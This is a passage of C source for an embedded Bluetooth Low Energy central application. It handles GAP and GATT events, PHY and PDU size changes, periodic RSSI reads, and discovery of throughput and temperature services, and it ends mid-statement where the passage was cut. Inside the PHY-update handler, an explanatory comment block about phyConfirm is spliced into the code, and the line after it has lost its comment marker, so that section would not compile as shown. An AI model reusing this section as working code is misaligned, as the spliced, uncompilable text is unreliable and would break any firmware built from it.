SimpleBLECentral_startDiscovery();\n }\n\n if (events & SBC_PERIODIC_LED_EVT)\n {\n Util_startClock(&periodicLED);\n\n // Perform periodic application task\n SimpleBLECentral_performLEDTask();\n }\n }\n }\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_processStackMsg\n *\n * @brief Process an incoming task message.\n *\n * @param pMsg - message to process\n *\n * @return none\n */\nstatic void SimpleBLECentral_processStackMsg(ICall_Hdr *pMsg)\n{\n switch (pMsg->event)\n {\n case GAP_MSG_EVENT:\n SimpleBLECentral_processRoleEvent((gapCentralRoleEvent_t *)pMsg);\n break;\n\n case GATT_MSG_EVENT:\n SimpleBLECentral_processGATTMsg((gattMsgEvent_t *)pMsg);\n break;\n\n case HCI_GAP_EVENT_EVENT:\n {\n // Process HCI message\n switch(pMsg->status)\n {\n case HCI_COMMAND_COMPLETE_EVENT_CODE:\n SimpleBLECentral_processCmdCompleteEvt((hciEvt_CmdComplete_t *)pMsg);\n break;\n\n case HCI_BLE_HARDWARE_ERROR_EVENT_CODE:\n AssertHandler(HAL_ASSERT_CAUSE_HARDWARE_ERROR,0);\n break;\n\n case HCI_LE_EVENT_CODE:\n {\n hciEvt_BLEPhyUpdateComplete_t *pPUC\n = (hciEvt_BLEPhyUpdateComplete_t*) pMsg;\n\n if (pPUC->BLEEventCode == HCI_BLE_PHY_UPDATE_COMPLETE_EVENT)\n {\n if (pPUC->status != SUCCESS)\n {\n Display_print0(dispHandle, SBC_ROW_RESULT, 0, \"PHY Change failure\");\n }\n else\n {\n // Inform the user that the PHY was updated and which PHY is\n // now being used for the connection\n Display_print0(dispHandle, SBC_ROW_RESULT, 0, \"PHY Update Complete\");\n\n // Figure out which PHY is being used\n uint8_t temp = 0;\n switch(pPUC->txPhy)\n {\n case HCI_PHY_1_MBPS:\n temp = 0;\n break;\n\n case HCI_PHY_2_MBPS:\n temp = 1;\n break;\n\n case HCI_PHY_CODED:\n temp = 4;\n break;\n }\n\n // If phyConfirm is false, that means we initiated the change;\n // if that is the case, then we can use detailed information\n // for coded PHY - use phyIndex instead\n if( phyConfirm == false)\n {\n // This means that the phyIndex was assigned by us.\n // Confirm the value\n\n // Critical Section so our Timer's SWI can't read the value while\n // we're writing to it.\n UInt key = Hwi_disable();\n {\n // Confirm the change to the phyIndex\n phyConfirm = true;\n }\n Hwi_restore(key);\n }\n else\n {\n // the peer device requested the change to PHY\n // update phyIndex accordingly and display the value\n phyIndex = temp;\n }\n
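\n // Note on phyConfirm (explanatory comment): phyConfirm == false here\n // means this central initiated the PHY change itself, so phyIndex\n // already holds the detailed index (including Coded:S2 vs Coded:S8,\n // which the HCI event cannot distinguish). phyConfirm == true means\n // the peer initiated the change, so the coarse index derived from the\n // event above is adopted instead.\n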
Tell the use which PHY we're now using\n Display_print1(dispHandle, SBC_ROW_PHY, 0, \"Current PHY: %s\", phyName[phyIndex]);\n\n Util_startClock(&periodicLED);\n }\n }\n }\n break;\n\n default:\n break;\n }\n }\n break;\n\n default:\n break;\n }\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_processAppMsg\n *\n * @brief Central application event processing function.\n *\n * @param pMsg - pointer to event structure\n *\n * @return none\n */\nstatic void SimpleBLECentral_processAppMsg(sbcEvt_t *pMsg)\n{\n\n attWriteReq_t writeReq = {0};\n\n switch (pMsg->hdr.event)\n {\n case SBC_STATE_CHANGE_EVT:\n SimpleBLECentral_processStackMsg((ICall_Hdr *)pMsg->pData);\n\n // Free the stack message\n ICall_freeMsg(pMsg->pData);\n break;\n\n case SBC_KEY_CHANGE_EVT:\n SimpleBLECentral_handleKeys(0, pMsg->hdr.state);\n break;\n\n case SBC_RSSI_READ_EVT:\n {\n readRssi_t *pRssi = (readRssi_t *)pMsg->pData;\n\n // If link is up and RSSI reads active\n if (pRssi->connHandle != GAP_CONNHANDLE_ALL &&\n linkDB_Up(pRssi->connHandle))\n {\n // Restart timer\n Util_restartClock(pRssi->pClock, pRssi->period);\n\n // Read RSSI\n VOID HCI_ReadRssiCmd(pRssi->connHandle);\n }\n }\n break;\n\n case SBC_ENABLE_TEMPERATURE_NOTI_EVT:\n {\n uint8_t data[2] = {0x01, 0x00};\n\n // Populate the Request Structure\n writeReq.cmd = 0;\n writeReq.handle = temperatureHandles[TEMPERATURE_SERVICE_DATA].charHdl + 1;\n writeReq.len = 2;\n writeReq.pValue = GATT_bm_alloc(connHandle, ATT_WRITE_REQ, 2, NULL);\n memcpy(writeReq.pValue, data, 2);\n writeReq.sig = 0;\n\n // Perform a GATT Write + Check Status\n uint8_t status;\n\n status = GATT_WriteCharValue(connHandle, &writeReq, selfEntity);\n\n if( status != SUCCESS ) {\n // Inform user that a Request was sent to update peer's PDU Size\n Display_print0(dispHandle, SBC_ROW_RESULT, 0, \"Can't enable Notifications\");\n\n GATT_bm_free((gattMsg_t *)writeReq.pValue, ATT_WRITE_REQ);\n }\n else {\n SimpleBLECentral_doSetPhy(3);\n }\n }\n break;\n\n case SBC_PDU_UPDATE_EVT:\n {\n // When Changing PDU Size, throughput is momentaryly stopped on the peripehral\n // side for the application to process the change.\n // During this time the throughput not reflect the correct value\n\n // Attempt to send PDU update via GATT Write\n // Variables Needed for GATT Write\n uint8_t pduSize = (uint8_t) *(pMsg->pData); // Cast down to uint8_t\n\n // Populate the Request Structure\n writeReq.cmd = 0;\n writeReq.handle = throughputHandles[THROUGHPUT_SERVICE_UPDATE_PDU].charHdl;\n writeReq.len = THROUGHPUT_SERVICE_UPDATE_PHY_LEN;\n writeReq.pValue = GATT_bm_alloc(connHandle, ATT_WRITE_REQ, THROUGHPUT_SERVICE_UPDATE_PHY_LEN, NULL);\n memcpy(writeReq.pValue, &pduSize, THROUGHPUT_SERVICE_UPDATE_PHY_LEN);\n writeReq.sig = 0;\n\n // Perform a GATT Write + Check Status\n uint8_t status;\n\n status = GATT_WriteCharValue(connHandle, &writeReq, selfEntity);\n\n if( status != SUCCESS )\n {\n // We didn't successfully send this command to the stack!\n // Let's attempt to retransmit again and free the pValue pointer\n\n GATT_bm_free((gattMsg_t *)writeReq.pValue, ATT_WRITE_REQ);\n\n // Requeue the Message - don't free the memory for PDU size yet\n SimpleBLECentral_enqueueMsg(SBC_PDU_UPDATE_EVT, SUCCESS, pMsg->pData);\n }\n else\n {\n // Transmitting to the stack was successful\n // The peripheral should being doing throughput soon\n\n // Inform user that a Request was sent to update peer's PDU Size\n Display_print1(dispHandle, SBC_ROW_RESULT, 0, \"Requested Peer Change 
TX PDU Size to %dB\", pduSize);\n\n // Free the Allocated Memory\n if(pMsg->pData)\n {\n ICall_free(pMsg->pData);\n }\n }\n break;\n }\n\n case SBC_PHY_UPDATE_EVT:\n {\n // When Changing PHY, throughput is stopped on the peripehral\n // side for the application to process the change.\n // During this time the throughput not reflect the correct value\n\n // Critial Section so our Timer's SWI can't read the value while\n // we're writing to it.\n UInt key = Hwi_disable();\n {\n // Assign the PHY index - so we can keep track of PHY,\n // more importantly, coded phy and which symbol rate is being used\n phyIndex = (uint8_t) *(pMsg->pData);\n // reset confirm, indicating that it's the PHY being used in the\n // connection yet.\n phyConfirm = false;\n }\n Hwi_restore(key);\n\n // Populate the Request Structure\n writeReq.cmd = 0;\n writeReq.handle = throughputHandles[THROUGHPUT_SERVICE_UPDATE_PHY].charHdl;\n writeReq.len = THROUGHPUT_SERVICE_UPDATE_PHY_LEN;\n writeReq.pValue = GATT_bm_alloc(connHandle, ATT_WRITE_REQ, THROUGHPUT_SERVICE_UPDATE_PHY_LEN, NULL);\n memcpy(writeReq.pValue, &phyIndex, THROUGHPUT_SERVICE_UPDATE_PHY_LEN);\n writeReq.sig = 0;\n\n // Perform a GATT Write + Check Status\n uint8_t status;\n\n status = GATT_WriteCharValue(connHandle, &writeReq, selfEntity);\n\n if( status != SUCCESS )\n {\n // We didn't successfully send this command to the stack!\n // Let's attempt to retransmit again and free the pValue pointer\n\n Display_print1(dispHandle, SBC_ROW_RESULT, 0, \"GATT_WriteCharValue status: %d\", status);\n\n GATT_bm_free((gattMsg_t *)writeReq.pValue, ATT_WRITE_REQ);\n\n // Requeue the Message - don't free the memory for PHY change yet\n SimpleBLECentral_enqueueMsg(SBC_PHY_UPDATE_EVT, SUCCESS, pMsg->pData);\n }\n else\n {\n // Transmitting to the stack was successful\n // The peripheral should being doing throughput soon\n\n // Inform user that a Request was sent to update peer's PHY Size\n Display_print1(dispHandle, SBC_ROW_RESULT, 0, \"Requested Peer Change PHY to %s\", phyName[phyIndex]);\n\n // Note if we're already using coded PHY, switching between S2 and S8\n // won't produce a PHY change event.\n\n // Free the Allocated Memory\n if(pMsg->pData)\n {\n ICall_free(pMsg->pData);\n }\n }\n break;\n }\n\n default:\n // Do nothing.\n break;\n }\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_processRoleEvent\n *\n * @brief Central role event processing function.\n *\n * @param pEvent - pointer to event structure\n *\n * @return none\n */\nstatic void SimpleBLECentral_processRoleEvent(gapCentralRoleEvent_t *pEvent)\n{\n switch (pEvent->gap.opcode)\n {\n case GAP_DEVICE_INIT_DONE_EVENT:\n {\n maxPduSize = pEvent->initDone.dataPktLen;\n Display_print1(dispHandle, SBC_ROW_RESULT, 0, \"This Device's BDADDR : %s\", Util_convertBdAddr2Str(pEvent->initDone.devAddr));\n }\n break;\n\n case GAP_DEVICE_INFO_EVENT:\n {\n /*\n * Device Filtering can be done here for UUID or advertisement\n * Data if desired.\n *\n * We populate the devList with both the scan response data and\n * advertisement data of each device discovered\n */\n SimpleBLECentral_addDeviceInfo(pEvent->deviceInfo.addr,\n pEvent->deviceInfo.addrType,\n pEvent->deviceInfo.eventType,\n pEvent->deviceInfo.dataLen,\n pEvent->deviceInfo.pEvtData);\n }\n break;\n\n case GAP_DEVICE_DISCOVERY_EVENT:\n {\n // Initialize scan index.\n scanIdx = -1;\n\n /*\n * Note that pEvent->discCmpl contains a list of device records (NOT scan response data)\n * Scan Response Data is 
contained in the GAP_DEVICE_INFO_EVENT during Scanning\n * We're verifying that we got the right number of device info responses\n * If you don't care about device response data, you could just use\n * the data from the GAP_DEVICE_DISCOVERY_EVENT as your scan results list\n * as shown in the commented code below\n *\n * If we're not filtering on UUID then we should have gotten ALL of the\n * possible devices scanned in our device list.\n */\n Display_print1(dispHandle, SBC_ROW_RESULT, 0, \"%d Devices Found\", scanRes);\n\n if (scanRes > 0)\n {\n // Re enable all Menu Functions\n tbm_setItemStatus(&sbcMenuScanandConnect, TBM_ITEM_ALL, TBM_ITEM_NONE);\n\n // Display the first scan Result\n SBC_NextDevice();\n }\n else\n {\n // No Results, reenable scanning only\n tbm_setItemStatus(&sbcMenuScanandConnect, TBM_ITEM_ALL, TBM_ITEM_0 | TBM_ITEM_1);\n }\n }\n break;\n\n case GAP_LINK_ESTABLISHED_EVENT:\n {\n if (pEvent->gap.hdr.status == SUCCESS)\n {\n state = BLE_STATE_CONNECTED;\n connHandle = pEvent->linkCmpl.connectionHandle;\n\n //Util_startClock(&periodicLED);\n\n // Go to Main Menu\n tbm_goTo(&sbcMenuMain);\n\n // Disable Scan Connect Menu, enable everything else\n tbm_setItemStatus(&sbcMenuMain, TBM_ITEM_ALL, TBM_ITEM_0);\n\n // Forget about the Scan Results\n SBC_ClearDeviceList();\n\n // If service discovery not performed initiate service discovery\n Util_startClock(&startDiscClock);\n\n // Update Display\n Display_print1(dispHandle, SBC_ROW_PEER_DEVICE, 0, \"Peer Device : %s\", Util_convertBdAddr2Str(pEvent->linkCmpl.devAddr));\n Display_print0(dispHandle, SBC_ROW_RESULT, 0, \"Connected, Exchanging MTU\");\n Display_print0(dispHandle, SBC_ROW_PHY, 0, \"PHY: 1 Mbps\");\n\n // Start RSSI collection\n SimpleBLECentral_StartRssi(connHandle, DEFAULT_RSSI_PERIOD);\n }\n else\n {\n state = BLE_STATE_IDLE;\n connHandle = GAP_CONNHANDLE_INIT;\n discState = BLE_DISC_STATE_IDLE;\n\n // TODO: Remember scan Results and re enable menu\n\n Display_print1(dispHandle, SBC_ROW_RESULT, 0, \"Reason: %d\", pEvent->gap.hdr.status);\n }\n }\n break;\n\n case GAP_LINK_TERMINATED_EVENT:\n {\n state = BLE_STATE_IDLE;\n connHandle = GAP_CONNHANDLE_INIT;\n discState = BLE_DISC_STATE_IDLE;\n scanIdx = -1;\n\n // Throughput as well, if enabled\n Util_stopClock(&periodicLED);\n SimpleBLECentral_performLEDTask();\n\n // Cancel RSSI reads\n SimpleBLECentral_CancelRssi(pEvent->linkTerminate.connectionHandle);\n\n Display_print1(dispHandle, SBC_ROW_RESULT, 0, \"Reason: %d\", pEvent->linkTerminate.reason);\n Display_clearLine(dispHandle, SBC_ROW_PEER_DEVICE);\n Display_clearLine(dispHandle, SBC_ROW_PHY);\n Display_clearLine(dispHandle, SBC_ROW_RSSI);\n Display_clearLine(dispHandle, SBC_ROW_TEMP);\n\n // Go to Main Menu\n tbm_goTo(&sbcMenuMain);\n\n // Enable Scan Connect Menu, Disable everything else\n tbm_setItemStatus(&sbcMenuMain, TBM_ITEM_0, TBM_ITEM_1 | TBM_ITEM_2 | TBM_ITEM_3 | TBM_ITEM_4);\n\n // No Results, reenable scanning only\n tbm_setItemStatus(&sbcMenuScanandConnect, TBM_ITEM_ALL, TBM_ITEM_0 | TBM_ITEM_1);\n }\n break;\n\n case GAP_LINK_PARAM_UPDATE_EVENT:\n {\n Display_print1(dispHandle, SBC_ROW_RESULT, 0, \"Param Update: %d\", pEvent->linkUpdate.status);\n }\n break;\n\n default:\n break;\n }\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_handleKeys\n *\n * @brief Handles all key events for this device.\n *\n * @param shift - true if in shift/alt.\n * @param keys - bit field for key events. 
Valid entries:\n * HAL_KEY_SW_2\n * HAL_KEY_SW_1\n *\n * @return none\n */\nstatic void SimpleBLECentral_handleKeys(uint8_t shift, uint8_t keys)\n{\n if (keys & KEY_LEFT)\n {\n // Check if the key is still pressed. WA for possible bouncing.\n if (PIN_getInputValue(Board_PIN_BUTTON0) == 0)\n {\n tbm_buttonLeft();\n }\n }\n\n if (keys & KEY_RIGHT)\n {\n // Check if the key is still pressed. WA for possible bouncing.\n if (PIN_getInputValue(Board_PIN_BUTTON1) == 0)\n {\n tbm_buttonRight();\n }\n }\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_processGATTMsg\n *\n * @brief Process GATT messages and events.\n *\n * @return none\n */\nstatic void SimpleBLECentral_processGATTMsg(gattMsgEvent_t *pMsg)\n{\n if (state == BLE_STATE_CONNECTED)\n {\n // See if GATT server was unable to transmit an ATT response\n if (pMsg->hdr.status == blePending)\n {\n // No HCI buffer was available. App can try to retransmit the response\n // on the next connection event. Drop it for now.\n // Display_print1(dispHandle, SBC_ROW_GATT_RESULT, 0, \"ATT Rsp dropped %d\", pMsg->method);\n }\n else if ((pMsg->method == ATT_READ_RSP) ||\n ((pMsg->method == ATT_ERROR_RSP) &&\n (pMsg->msg.errorRsp.reqOpcode == ATT_READ_REQ)))\n {\n if (pMsg->method == ATT_ERROR_RSP)\n {\n // Display_print1(dispHandle, SBC_ROW_GATT_RESULT, 0, \"Read Error %d\", pMsg->msg.errorRsp.errCode);\n }\n else\n {\n // After a successful read, display the read value\n // Display_print1(dispHandle, SBC_ROW_GATT_RESULT, 0, \"Read rsp: %d\", pMsg->msg.readRsp.pValue[0]);\n }\n }\n else if ((pMsg->method == ATT_WRITE_RSP) ||\n ((pMsg->method == ATT_ERROR_RSP) &&\n (pMsg->msg.errorRsp.reqOpcode == ATT_WRITE_REQ)))\n {\n if (pMsg->method == ATT_ERROR_RSP)\n {\n Display_print1(dispHandle, SBC_ROW_RESULT, 0, \"GATT Write Error %d\", pMsg->msg.errorRsp.errCode);\n }\n else\n {\n // After a successful write, display the value that was written and\n // increment value\n Display_print0(dispHandle, SBC_ROW_RESULT, 0, \"GATT Write Sent to Peer\");\n }\n }\n else if (pMsg->method == ATT_FLOW_CTRL_VIOLATED_EVENT)\n {\n // ATT request-response or indication-confirmation flow control is\n // violated. 
All subsequent ATT requests or indications will be dropped.\n // The app is informed in case it wants to drop the connection.\n\n // Display the opcode of the message that caused the violation.\n // Display_print1(dispHandle, SBC_ROW_GATT_RESULT, 0, \"FC Violated: %d\", pMsg->msg.flowCtrlEvt.opcode);\n }\n else if (pMsg->method == ATT_HANDLE_VALUE_NOTI)\n {\n // Critial Section so our Timer's SWI can't read the value while\n // we're writing to it.\n// UInt key = Hwi_disable();\n// {\n// bytesRecvd += pMsg->msg.handleValueNoti.len;\n// }\n// Hwi_restore(key);\n Temperature_Service_Data *data = (Temperature_Service_Data *)pMsg->msg.handleValueNoti.pValue;\n\n Display_print1(dispHandle, SBC_ROW_TEMP, 0, \"Object Temperature: %02d (C)\",\n BUILD_UINT16(data->objectLowByte, data->objectHighByte));\n }\n else if (pMsg->method == ATT_MTU_UPDATED_EVENT)\n {\n // MTU size updated\n Display_print0(dispHandle, SBC_ROW_RESULT, 0, \"MTU Exchanged\");\n }\n else if (discState != BLE_DISC_STATE_IDLE)\n {\n SimpleBLECentral_processGATTDiscEvent(pMsg);\n }\n } // else - in case a GATT message came after a connection has dropped, ignore it.\n\n // Needed only for ATT Protocol messages\n GATT_bm_free(&pMsg->msg, pMsg->method);\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_processCmdCompleteEvt\n *\n * @brief Process an incoming OSAL HCI Command Complete Event.\n *\n * @param pMsg - message to process\n *\n * @return none\n */\nstatic void SimpleBLECentral_processCmdCompleteEvt(hciEvt_CmdComplete_t *pMsg)\n{\n switch (pMsg->cmdOpcode)\n {\n case HCI_READ_RSSI:\n {\n int8 rssi = (int8)pMsg->pReturnParam[3];\n\n Display_print1(dispHandle, SBC_ROW_RSSI, 0, \"RSSI -dBm: %d\", (uint32_t)(-rssi));\n }\n break;\n\n default:\n break;\n }\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_StartRssi\n *\n * @brief Start periodic RSSI reads on a link.\n *\n * @param connHandle - connection handle of link\n * @param period - RSSI read period in ms\n *\n * @return SUCCESS: Terminate started\n * bleIncorrectMode: No link\n * bleNoResources: No resources\n */\nstatic bStatus_t SimpleBLECentral_StartRssi(uint16_t connHandle, uint16_t period)\n{\n readRssi_t *pRssi;\n\n // Verify link is up\n if (!linkDB_Up(connHandle))\n {\n return bleIncorrectMode;\n }\n\n // If already allocated\n if ((pRssi = SimpleBLECentral_RssiFind(connHandle)) != NULL)\n {\n // Stop timer\n Util_stopClock(pRssi->pClock);\n\n pRssi->period = period;\n }\n // Allocate structure\n else if ((pRssi = SimpleBLECentral_RssiAlloc(connHandle)) != NULL)\n {\n pRssi->period = period;\n }\n // Allocate failed\n else\n {\n return bleNoResources;\n }\n\n // Start timer\n Util_restartClock(pRssi->pClock, period);\n\n return SUCCESS;\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_CancelRssi\n *\n * @brief Cancel periodic RSSI reads on a link.\n *\n * @param connHandle - connection handle of link\n *\n * @return SUCCESS: Operation successful\n * bleIncorrectMode: No link\n */\nstatic bStatus_t SimpleBLECentral_CancelRssi(uint16_t connHandle)\n{\n readRssi_t *pRssi;\n\n if ((pRssi = SimpleBLECentral_RssiFind(connHandle)) != NULL)\n {\n // Stop timer\n Util_stopClock(pRssi->pClock);\n\n // Free RSSI structure\n SimpleBLECentral_RssiFree(connHandle);\n\n return SUCCESS;\n }\n\n // Not found\n return bleIncorrectMode;\n}\n\n/*********************************************************************\n * @fn 
gapCentralRole_RssiAlloc\n *\n * @brief Allocate an RSSI structure.\n *\n * @param connHandle - Connection handle\n *\n * @return pointer to structure or NULL if allocation failed.\n */\nstatic readRssi_t *SimpleBLECentral_RssiAlloc(uint16_t connHandle)\n{\n uint8_t i;\n\n // Find free RSSI structure\n for (i = 0; i < MAX_NUM_BLE_CONNS; i++)\n {\n if (readRssi[i].connHandle == GAP_CONNHANDLE_ALL)\n {\n readRssi_t *pRssi = &readRssi[i];\n\n pRssi->pClock = (Clock_Struct *)ICall_malloc(sizeof(Clock_Struct));\n if (pRssi->pClock)\n {\n Util_constructClock(pRssi->pClock, SimpleBLECentral_readRssiHandler,\n 0, 0, false, i);\n pRssi->connHandle = connHandle;\n\n return pRssi;\n }\n }\n }\n\n // No free structure found\n return NULL;\n}\n\n/*********************************************************************\n * @fn gapCentralRole_RssiFind\n *\n * @brief Find an RSSI structure.\n *\n * @param connHandle - Connection handle\n *\n * @return pointer to structure or NULL if not found.\n */\nstatic readRssi_t *SimpleBLECentral_RssiFind(uint16_t connHandle)\n{\n uint8_t i;\n\n // Find free RSSI structure\n for (i = 0; i < MAX_NUM_BLE_CONNS; i++)\n {\n if (readRssi[i].connHandle == connHandle)\n {\n return &readRssi[i];\n }\n }\n\n // Not found\n return NULL;\n}\n\n/*********************************************************************\n * @fn gapCentralRole_RssiFree\n *\n * @brief Free an RSSI structure.\n *\n * @param connHandle - Connection handle\n *\n * @return none\n */\nstatic void SimpleBLECentral_RssiFree(uint16_t connHandle)\n{\n uint8_t i;\n\n // Find RSSI structure\n for (i = 0; i < MAX_NUM_BLE_CONNS; i++)\n {\n if (readRssi[i].connHandle == connHandle)\n {\n readRssi_t *pRssi = &readRssi[i];\n if (pRssi->pClock)\n {\n Clock_destruct(pRssi->pClock);\n\n // Free clock struct\n ICall_free(pRssi->pClock);\n pRssi->pClock = NULL;\n }\n\n pRssi->connHandle = GAP_CONNHANDLE_ALL;\n break;\n }\n }\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_startDiscovery\n *\n * @brief Start service discovery.\n *\n * @return none\n */\nstatic void SimpleBLECentral_startDiscovery(void)\n{\n attExchangeMTUReq_t req;\n\n // Initialize cached handles\n svcStartHdl = svcEndHdl = 0;\n\n // Free up memory for Characteristic handles\n if ( throughputHandles )\n {\n ICall_free(throughputHandles);\n throughputHandles = NULL;\n }\n\n if ( temperatureHandles )\n {\n ICall_free(temperatureHandles);\n temperatureHandles = NULL;\n }\n\n // Prep the State Machine for MTU Exchange\n discState = BLE_DISC_STATE_MTU;\n\n // Discover GATT Server's Rx MTU size\n req.clientRxMTU = maxPduSize - L2CAP_HDR_SIZE;\n\n // ATT MTU size should be set to the minimum of the Client Rx MTU\n // and Server Rx MTU values\n VOID GATT_ExchangeMTU(connHandle, &req, selfEntity);\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_findSvcUuid\n *\n * @brief Find a given UUID in an advertiser's service UUID list.\n *\n * @return TRUE if service UUID found\n */\nstatic bool SimpleBLECentral_findSvcUuid(uint16_t uuid, uint8_t *pData,\n uint8_t dataLen)\n{\n uint8_t adLen;\n uint8_t adType;\n uint8_t *pEnd;\n\n pEnd = pData + dataLen - 1;\n\n // While end of data not reached\n while (pData < pEnd)\n {\n // Get length of next AD item\n adLen = *pData++;\n if (adLen > 0)\n {\n adType = *pData;\n\n // If AD type is for 16-bit service UUID\n if ((adType == GAP_ADTYPE_16BIT_MORE) ||\n (adType == GAP_ADTYPE_16BIT_COMPLETE))\n {\n pData++;\n adLen--;\n\n // 
For each UUID in list\n while (adLen >= 2 && pData < pEnd)\n {\n // Check for match\n if ((pData[0] == LO_UINT16(uuid)) && (pData[1] == HI_UINT16(uuid)))\n {\n // Match found\n return TRUE;\n }\n\n // Go to next\n pData += 2;\n adLen -= 2;\n }\n\n // Handle possible erroneous extra byte in UUID list\n if (adLen == 1)\n {\n pData++;\n }\n }\n else\n {\n // Go to next item\n pData += adLen;\n }\n }\n }\n\n // Match not found\n return FALSE;\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_processGATTDiscEvent\n *\n * @brief Process GATT discovery event\n *\n * @return none\n */\nstatic void SimpleBLECentral_processGATTDiscEvent(gattMsgEvent_t *pMsg)\n{\n int i = 0;\n\n switch(discState)\n {\n case BLE_DISC_STATE_MTU:\n {\n // MTU size response received, discover simple BLE service\n if (pMsg->method == ATT_EXCHANGE_MTU_RSP)\n {\n // Use the Discovery State Machine to get service start stop handles\n discState = BLE_DISC_STATE_THROUGHPUT_SERVICE;\n\n // UUID of Service to be Discovered\n uint8_t uuid[ATT_UUID_SIZE] = { TI_BASE_UUID_128(THROUGHPUT_SERVICE_SERV_UUID) };\n\n // Discovery throughput service\n VOID GATT_DiscPrimaryServiceByUUID(connHandle, uuid, ATT_UUID_SIZE,\n selfEntity);\n }\n else {\n //Do something else if we didn't get a RSP\n }\n }\n break;\n\n case BLE_DISC_STATE_THROUGHPUT_SERVICE:\n {\n // Service found, store handles\n if (pMsg->method == ATT_FIND_BY_TYPE_VALUE_RSP &&\n pMsg->msg.findByTypeValueRsp.numInfo > 0)\n {\n svcStartHdl = ATT_ATTR_HANDLE(pMsg->msg.findByTypeValueRsp.pHandlesInfo, 0);\n svcEndHdl = ATT_GRP_END_HANDLE(pMsg->msg.findByTypeValueRsp.pHandlesInfo, 0);\n }\n\n if (((pMsg->hdr.status == bleProcedureComplete) ||\n (pMsg->method == ATT_ERROR_RSP)) && svcStartHdl)\n {\n // The Throughput Service Exists!\n // At this point save valid svcStartHdl and svcEndHdl\n // A write can be performed if needed to a particular UUID\n // Defined in the profile's header file\n // Further discovery is needed to determine characteristic value handles\n\n // Set Statemachine to parse ATT_READ_BY_TYPE_RSP\n discState = BLE_DISC_STATE_THROUGHPUT_CHAR;\n\n // Find all characteristics within our throughput service\n VOID GATT_DiscAllChars(connHandle, svcStartHdl, svcEndHdl, selfEntity);\n }\n }\n break;\n\n case BLE_DISC_STATE_THROUGHPUT_CHAR:\n {\n // Characteristics found, store handles\n if ((pMsg->method == ATT_READ_BY_TYPE_RSP) &&\n (pMsg->msg.readByTypeRsp.numPairs > 0))\n {\n // Allocate space for the handle UUID pairs\n throughputHandles = ICall_malloc(sizeof(CharProfileHdl_t) * pMsg->msg.readByTypeRsp.numPairs);\n\n // Note there are 16 bytes in a 128bit UUID + 2 bytes for the Handle\n // 18 bytes of information need to be copied\n // the remaining 3 bytes indiated in the length field is due to\n // Header information the stack uses.\n for (i = 0; i < pMsg->msg.readByTypeRsp.numPairs; i++)\n {\n // Due to the difference between the structure and the data given, apply some logic to\n // extract out the correct information (ie, ignore the 3 byte header)\n CharProfileHdl_t* temp = (CharProfileHdl_t*)((pMsg->msg.readByTypeRsp.pDataList + 3) + (pMsg->msg.readByTypeRsp.len * i));\n\n throughputHandles[i].charHdl = temp->charHdl;\n memcpy(throughputHandles[i].addr, temp->addr, ATT_UUID_SIZE);\n }\n // Now verify that the UUIDs are in the order the indexes are\n // We'll skip this step, as the way we implemented the profile on\n // the peripheral always responds with PDU first then PHY characteristics\n\n // This means we 
can index throughputHandles like throughputHandles[THROUGHPUT_SERVICE_UPDATE_PDU]\n }\n\n if (((pMsg->hdr.status == bleProcedureComplete) ||\n (pMsg->method == ATT_ERROR_RSP)) && throughputHandles)\n {\n // Inform user that the Throughput Service is found, and ready to use\n Display_print0(dispHandle, SBC_ROW_RESULT, 0, \"Throughput Service Found, Starting Throughput\");\n\n // Set Statemachine to parse ATT_READ_BY_TYPE_RSP\n discState = BLE_DISC_STATE_TEMPERATURE_SERVICE;\n svcStartHdl = svcEndHdl = 0;\n\n // UUID of Service to be Discovered\n uint8_t uuid[ATT_UUID_SIZE] = { TI_BASE_UUID_128(TEMPERATURE_SERVICE_SERV_UUID) };\n\n // Discovery throughput service\n VOID GATT_DiscPrimaryServiceByUUID(connHandle, uuid, ATT_UUID_SIZE,\n selfEntity);\n }\n }\n break;\n\n case BLE_DISC_STATE_TEMPERATURE_SERVICE:\n {\n // Service found, store handles\n if (pMsg->method == ATT_FIND_BY_TYPE_VALUE_RSP &&\n pMsg->msg.findByTypeValueRsp.numInfo > 0)\n {\n svcStartHdl = ATT_ATTR_HANDLE(pMsg->msg.findByTypeValueRsp.pHandlesInfo, 0);\n svcEndHdl = ATT_GRP_END_HANDLE(pMsg->msg.findByTypeValueRsp.pHandlesInfo, 0);\n }\n\n if (((pMsg->hdr.status == bleProcedureComplete) ||\n (pMsg->method == ATT_ERROR_RSP)) && svcStartHdl)\n {\n // The Throughput Service Exists!\n // At this point save valid svcStartHdl and svcEndHdl\n // A write can be performed if needed to a particular UUID\n // Defined in the profile's header file\n // Further discovery is needed to determine characteristic value handles\n\n // Set Statemachine to parse ATT_READ_BY_TYPE_RSP\n discState = BLE_DISC_STATE_TEMPERATURE_CHAR;\n\n // Find all characteristics within our throughput service\n VOID GATT_DiscAllChars(connHandle, svcStartHdl, svcEndHdl, selfEntity);\n }\n }\n break;\n\n case BLE_DISC_STATE_TEMPERATURE_CHAR:\n {\n // Characteristics found, store handles\n if ((pMsg->method == ATT_READ_BY_TYPE_RSP) &&\n (pMsg->msg.readByTypeRsp.numPairs > 0))\n {\n // Allocate space for the handle UUID pairs\n temperatureHandles = ICall_malloc(sizeof(CharProfileHdl_t) * pMsg->msg.readByTypeRsp.numPairs);\n\n // Note there are 16 bytes in a 128bit UUID + 2 bytes for the Handle\n // 18 bytes of information need to be copied\n // the remaining 3 bytes indiated in the length field is due to\n // Header information the stack uses.\n for (i = 0; i < pMsg->msg.readByTypeRsp.numPairs; i++)\n {\n // Due to the difference between the structure and the data given, apply some logic to\n // extract out the correct information (ie, ignore the 3 byte header)\n CharProfileHdl_t* temp = (CharProfileHdl_t*)((pMsg->msg.readByTypeRsp.pDataList + 3) + (pMsg->msg.readByTypeRsp.len * i));\n\n temperatureHandles[i].charHdl = temp->charHdl;\n memcpy(temperatureHandles[i].addr, temp->addr, ATT_UUID_SIZE);\n }\n // Now verify that the UUIDs are in the order the indexes are\n // We'll skip this step, as the way we implemented the profile on\n // the peripheral always responds with PDU first then PHY characteristics\n\n // This means we can index temperatureHandles like temperatureHandles[THROUGHPUT_SERVICE_UPDATE_PDU]\n }\n\n if 